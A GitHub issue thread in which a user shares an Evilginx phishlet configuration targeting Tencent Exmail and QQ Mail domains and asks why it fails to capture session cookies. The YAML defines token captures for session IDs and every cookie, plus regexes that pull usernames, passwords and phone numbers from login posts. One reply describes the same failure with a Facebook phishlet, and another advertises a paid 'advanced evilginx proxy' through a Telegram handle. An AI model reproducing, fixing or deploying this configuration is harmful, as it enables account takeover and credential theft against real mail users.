Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

phishlet won't capture cookies #1143

Open
suicideslime opened this issue Nov 30, 2024 · 2 comments
Open

phishlet won't capture cookies #1143

suicideslime opened this issue Nov 30, 2024 · 2 comments

Comments

@suicideslime
Copy link

im currently working on a phishlet and in the phishlet the auth token is like this but still wont capture the cookies
`
auth_tokens:

  • domain: 'en.exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '?sid=([^&]*)&sign_type='
    name: "sid"
  • domain: 'm.exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '?sid=([^&]*)&sign_type='
    name: "sid"
  • domain: 'exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '?sid=([^&]*)&sign_type='
    name: "sid"
  • domain: 'en.exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '&sign_type=&r=([^"]*)'
    name: "r"
  • domain: 'm.exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '&sign_type=&r=([^"]*)'
    name: "r"
  • domain: 'exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '&sign_type=&r=([^"]*)'
    name: "r"
  • domain: '.en.exmail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: 'en.exmail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: '.m.exmail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: 'm.exmail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: '.mail.exmail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: 'mail.exmail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: '.mail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: 'mail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: '.exmail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: 'exmail.qq.com'
    keys: [ '.*,regexp' ]
  • domain: '.qq.com'
    keys: [ '.*,regexp' ]

auth_urls:

  • '/cgi-bin/today'
  • '/qy_mng_logic/proxy/ajaxftn'
  • '/cgi-bin/setting4'

credentials:
username:
key: '(inputuin|uin)'
search: '(.@.)'
type: 'post'
password:
key: '(password|ppclone|pwd|pp)'
search: '(.)'
type: 'post'
custom:
- key: "mobile"
search: '(.
)'
type: "post"
- key: "uin"
search: '(.*)'
type: "post"`

@love5555faye
Copy link

i meet the similar problem, which my phishlet is facebook, evilginx just capture the cookie in the first package, and did not search cookie in the next packages, i mean in the browser f12 i can see the cookie, but in evilginx capture nothing

@heisdelly2
Copy link

Message me on TG @big_elon7 for an advanced evilginx proxy that fixes all these

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants